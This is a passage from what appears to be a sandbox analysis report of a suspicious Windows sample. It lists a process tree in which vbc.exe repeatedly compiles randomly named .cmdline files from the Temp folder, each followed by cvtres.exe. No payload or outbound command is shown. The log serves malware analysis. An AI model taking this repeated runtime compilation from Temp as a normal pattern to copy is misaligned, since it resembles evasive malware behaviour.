        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES18.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc81EA2AC21BBA45309197E813DE1F3CA.TMP"
        6⤵
        
        PID:4812
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\x-ixpifk.cmdline"
        5⤵
        
        PID:1316
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES122.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB92235CF87AC4D46A9E6B154399246E.TMP"
        6⤵
        
        PID:6044
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\pkhpzfgz.cmdline"
        5⤵
        
        PID:5588
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES21C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD88AC84D35354FF6B9B365FFB3C7C073.TMP"
        6⤵
        
        PID:5660
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\neha6fac.cmdline"
        5⤵
        
        PID:5052
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES64DD.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc53C8BA4E9ACD494EAC623FC165AA6BA1.TMP"
        6⤵
        
        PID:2052
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mgezyyce.cmdline"
        5⤵
        
        PID:2576
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES656A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc7907B2FE715462694D9D4A813C3BACF.TMP"
        6⤵
        
        PID:3496
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\8-5ef7yy.cmdline"
        5⤵
        
        PID:5268
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6616.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEE00CD113F3A413086937D87A4906520.TMP"
        6⤵
        
        PID:2752
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\fnjotay0.cmdline"
        5⤵
        
        PID:5960
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES66A2.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD569FE564E834A69961CB190C62CEB59.TMP"
        6⤵
        
        PID:2512
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\dytvzpkc.cmdline"
        5⤵
        
        PID:688
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC906.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA0B3B890F11446DA8E238A78239FFF7E.TMP"
        6⤵
        
        PID:5924
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\bpq3wpiu.cmdline"
        5⤵
        
        PID:5496
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC9A2.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4E0C79E2351248FB991933338E5222A.TMP"
        6⤵
        
        PID:4048
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\llzjb163.cmdline"
        5⤵
        
        PID:2228
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA7D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc24EC27C82E4999A78D8BED9ADC084.TMP"
        6⤵
        
        PID:4496
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qkhvdlvc.cmdline"
        5⤵
        
        PID:4228
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCB09.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc87017084A103470A9390F7E982D14991.TMP"
        6⤵
        
        PID:4628
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kotqv93j.cmdline"
        5⤵
        
        PID:880
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCBB5.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA84D8314D7E94B06B2F26CE2DF9A5972.TMP"
        6⤵
        
        PID:3424
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mgigcntm.cmdline"
        5⤵
        
        PID:5980
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC32.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFF92D481571E481A94F83FF848CE2EE3.TMP"
        6⤵
        
        PID:5348
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\zdbdd39w.cmdline"
        5⤵
        
        PID:4256
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCCCF.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc594866A23F0C4852A4B3FE55E6B6630.TMP"
        6⤵
        
        PID:1684
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\k7d7thji.cmdline"
        5⤵
        
        PID:4788
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCD4C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc29688F9899F54BE9A7C63F2A45720BC.TMP"
        6⤵
        
        PID:3960
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xktsnsm8.cmdline"
        5⤵
        
        PID:3524
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCDE8.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA78B61D4B57477DA63E1FBA575968C1.TMP"
        6⤵
        
        PID:4796
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\x4zszmzu.cmdline"
        5⤵
        
        PID:4120
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCEC3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc409CFE7825A847FDAA467BA489E0C261.TMP"
        6⤵
        
        PID:3620
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\amfuajvd.cmdline"
        5⤵
        
        PID:5116
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\zb3amcdy.cmdline"
        5⤵
        
        PID:4680
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCFAD.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcBDAC9269CBF466083E4594EED7D4DB4.TMP"
        6⤵
        
        PID:4828
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mujuld_y.cmdline"
        5⤵
        
        PID:5824
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD03A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD2E5B1E8C3A34AC78296F881D174EBA.TMP"
        6⤵
        
        PID:5036
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\gmls8gyy.cmdline"
        5⤵
        
        PID:888
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD0F5.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA1FDE7C9B3514D06A95C337F60487B4E.TMP"
        6⤵
        
        PID:4000
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\utwrl4c3.cmdline"
        5⤵
        
        PID:5124
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD191.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc49EA10F8F0094558951EB52E29E37CE.TMP"
        6⤵
        
        PID:4744
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\vmmltsdb.cmdline"
        5⤵
        
        PID:5356
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD21E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9B46BCEAC6F1475A904D674B52529E.TMP"
        6⤵
        
        PID:5448
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lobwjkxs.cmdline"
        5⤵
        
        PID:2372
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD2BA.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc79BBD59C9AE64F989FEBBA932DD15E4.TMP"
        6⤵
        
        PID:5432
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\uiv6a8-c.cmdline"
        5⤵
        
        PID:688
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD395.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4ABDA89BD27A4A11B8BBA0F247308B89.TMP"
        6⤵
        
        PID:5496
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\jsdxsm4h.cmdline"
        5⤵
        
        PID:4572
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD431.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcAC8AA17175AC4FC18ECF5BA876FB4698.TMP"
        6⤵
        
        PID:5056
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\4xxqubed.cmdline"
        5⤵
        
        PID:4208
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD4CD.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc269CE48E80046218E12923ACE452774.TMP"
        6⤵
        
        PID:3196
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\efv8-z-r.cmdline"
        5⤵
        
        PID:1820
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD56A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2F736018A2BA483198B967698EE3E6.TMP"
        6⤵
        
        PID:3684
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\8-hp4cq3.cmdline"
        5⤵
        
        PID:5080
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD616.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc3CCBFB9DEACE4AABA2D1982BD7E1C3E.TMP"
        6⤵
        
        PID:1504
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\pnekxkr2.cmdline"
        5⤵
        
        PID:2468
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD6A2.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9440661742FE4360962269732BD925DD.TMP"
        6⤵
        
        PID:5268
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wb0tbp2p.cmdline"
        5⤵
        
        PID:5172
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD710.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC71C2E83E1C44715AD569B3421D40E6.TMP"
        6⤵
        
        PID:4396
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mwphig9k.cmdline"
        5⤵
        
        PID:3156
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD7CB.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA5E1E67FF414410CA157A5A59D8099B3.TMP"
        6⤵
        
        PID:4532
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\b9wywf34.cmdline"
        5⤵
        
        PID:4084
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\1lkacoay.cmdline"
        5⤵
        
        PID:5768
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD8B5.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6687E66C1F414DB1AF3F3A2949D75D5F.TMP"
        6⤵
        
        PID:5160
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ctkw3nbx.cmdline"
        5⤵
        
        PID:1456
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD961.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1C2C5C651B5E49DB8DCDC7B0A0FCEDC3.TMP"
        6⤵
        
        PID:3112
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tcs_y1en.cmdline"
        5⤵
        
        PID:4808
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD9FE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc71CB6A11A56743F0BB792DDAAFDE7CF4.TMP"
        6⤵
        
        PID:5412
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ixwemade.cmdline"
        5⤵
        
        PID:2616
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDA8A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcBD0FD59ED22425BA7CC4C99551F166.TMP"
        6⤵
        
        PID:2872
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\8tkndl-u.cmdline"
        5⤵
        
        PID:248
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\pizldeoc.cmdline"
        5⤵
        
        PID:2544
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDB94.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1118609769724ADB9FE1ACA19859ABD.TMP"
        6⤵
        
        PID:3104
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\fmupmt1s.cmdline"
        5⤵
        
        PID:3148
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDC20.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc13A12EA66CA84F2AB84CB0E0C833D17B.TMP"
        6⤵
        
        PID:5636
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ki5se10b.cmdline"
        5⤵
        
        PID:5924
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDC8E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc8A2BD7B65601484D8150BAE4B3D9EBB4.TMP"
        6⤵
        
        PID:2624
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lleavkrw.cmdline"
        5⤵
        
        PID:6048
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDD0B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcBAD72E38643B4AEDA11A91A2F811E45.TMP"
        6⤵
        
        PID:952
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ezfmam7b.cmdline"
        5⤵
        
        PID:3804
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDDB7.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4D1E97E92D214EB9A81E144F019EDD.TMP"
        6⤵
        
        PID:184
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\4rwmn59q.cmdline"
        5⤵
        
        PID:2252
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDE82.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFE9F401ECFD8473C85CE45885947C86.TMP"
        6⤵
        
        PID:3860
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hpiulzse.cmdline"
        5⤵
        
        PID:5256
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDF0E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc3A17B6B8E40F476C99A8E2DE3D57B368.TMP"
        6⤵
        
        PID:1380
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\bk5ovbr-.cmdline"
        5⤵
        
        PID:1464
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDFAB.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc96058AE223274C26A3B262E25D81B6.TMP"
        6⤵
        
        PID:5080
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\x9_inq_h.cmdline"
        5⤵
        
        PID:4236
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
